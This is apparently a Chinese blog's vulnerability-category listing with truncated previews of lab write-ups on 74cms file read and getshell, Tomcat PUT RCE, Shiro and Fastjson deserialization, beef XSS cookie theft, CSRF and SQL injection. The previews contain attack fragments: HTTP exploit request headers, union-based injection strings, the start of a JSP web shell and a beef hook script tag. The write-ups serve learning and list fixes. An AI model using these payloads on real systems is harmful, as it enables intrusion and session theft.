![](https://img-blog.csdnimg.cn/20201014180756918.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞
文章平均质量分 57
blank er
这个作者很懒,什么都没留下…
展开
-
74cms v4.2.126-任意文件读取漏洞
pocPOST /74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=Home&c=Members&a=register HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0Accept: text/html,application/xhtml+原创 2021-09-19 22:10:50 · 605 阅读 · 0 评论 -
74cms v4.2.1-v4.2.129-后台getshell漏洞复现
74cms v4.2.1-v4.2.129-后台getshell漏洞复现下载地址漏洞复现下载地址http://www.74cms.com/download/index.html漏洞复现进入后台http://127.0.0.1/74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=admin&c=index&a=index抓包,修改post值POST /74cms_home_setup_v4.2.111/74原创 2021-09-19 20:28:11 · 387 阅读 · 0 评论 -
Nginx、Shiro
@TOCNginx解析漏洞漏洞描述:该漏洞利用Nginx配置错误,解析了URL地址,导致可以绕过服务器限制,从而解析PHP文件,造成命令执行的危害。风险等级:高漏洞危害:攻击者可以利用该漏洞上传木马文件,可以成功获取服务器权限。整改意见:1.修改php.ini,设置cgi.fix_pathinfo = 0。2.修改配置文件vim /etc/php5/fpm/pool.d/www.conf将security.limit_extensions=,设置为:security.limit_ext原创 2021-08-21 11:47:43 · 377 阅读 · 0 评论 -
Tomcat、phpMyAdmin、SQL
漏洞大全Tomcat远程代码执行phpMyAdmin远程代码执行SQL注入漏洞Jboss反序列化Tomcat远程代码执行漏洞描述:该系统使用apache tomcat/7.0.79,该版本在启用PUT请求方法后存在远程代码执行漏洞,可获取服务器权限。风险等级:高漏洞危害:攻击者可利用该漏洞获取服务器上的数据或权限。整改建议:1.禁用PUT请求方法;2.将tomcat版本升级到最新版本。脚本:<% if("023".equals(request.getParameter("pw原创 2021-08-21 11:46:42 · 135 阅读 · 0 评论 -
Fastjson反序列化
Fastjson反序列化漏洞描述漏洞描述Fastjson是json解析库。主要是将Java Bean序列化为json字符串,将Json字符串反序列化为Java Bean。原创 2021-08-16 22:00:08 · 328 阅读 · 0 评论 -
shiro反序列化漏洞
shiro反序列化反序列化简介什么是反序列化?漏洞原理检测方法漏洞利用修复方案反序列化简介什么是反序列化?首先了解序列化和反序列化地概念序列化:将对象转换成字节序列的过程。反序列化:将字节序列转换成对象的过程。漏洞原理Apache shiro框架提供rememberme的功能,用户登录成功后,会生成一个cookie,该cookie的值是经过相关信息序列化,然后AES加密,Base64编码处理成的。在服务器接收到cookie之后1.先检索rememberme cookie的值2.Base64原创 2021-08-15 21:38:04 · 778 阅读 · 0 评论 -
xss漏洞---beef应用
xss漏洞实验环境实验步骤get cookieredirect browser(iframe)实验环境beef、Windows10、kali实验步骤get cookie将cookie的值添加到一个浏览器的页面然后将一个登进去的页面的链接复制过来发现直接登进去了不需要账号和密码redirect browser(iframe)new title ----名字new favicon-----角标https://dss0.bdstatic.com/-0U0bnSm1A5BphGln原创 2021-06-26 23:03:58 · 110 阅读 · 0 评论 -
xss漏洞进阶
xssxss漏洞利用xss漏洞利用1.安装beefapt-get updateapt-get install bee-xss2.配置密码/etc/beef-xss/config.yaml默认用户名为beef默认密码为beef修改密码为123456注意密码要用引号引起来3.启动服务beef-xss可以看到生成的链接 Web UI: http://127.0.0.1:3000/ui/panel Hook: <script src="http://<IP>:300原创 2021-06-26 19:51:13 · 150 阅读 · 0 评论 -
csrf(post)
csrf实验准备实验环境实验步骤实验准备实验环境卡利、xshell、火狐浏览器、burpsuite实验步骤1.实验所需脚本111qqq.php<html><head><script>window.onload = function() { document.getElementById("postsubmit").click();}</script></head><body><form metho原创 2021-06-26 16:06:12 · 383 阅读 · 0 评论 -
csrf(get)
csrf简介实验csrf (get)简介跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作 的攻击方法。简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是原创 2021-06-20 18:27:34 · 429 阅读 · 2 评论 -
sql注入
复制sql注入数字型字符型搜索型xx型布尔盲注基于时间盲注显错注入insert/update注入insertupdatedelete注入http headeruser-agentcookie宽字节数字型在pikachu上面选择数字4后抓包在包里将数字改为1‘Send发现数据报错如下图所示id=1 and 1=1#数字型不需要单引号,双引号闭合,所以更容易受到攻击id=1 union select 1,2 #id=1 union select 1,database()#原创 2021-06-10 17:20:39 · 89 阅读 · 0 评论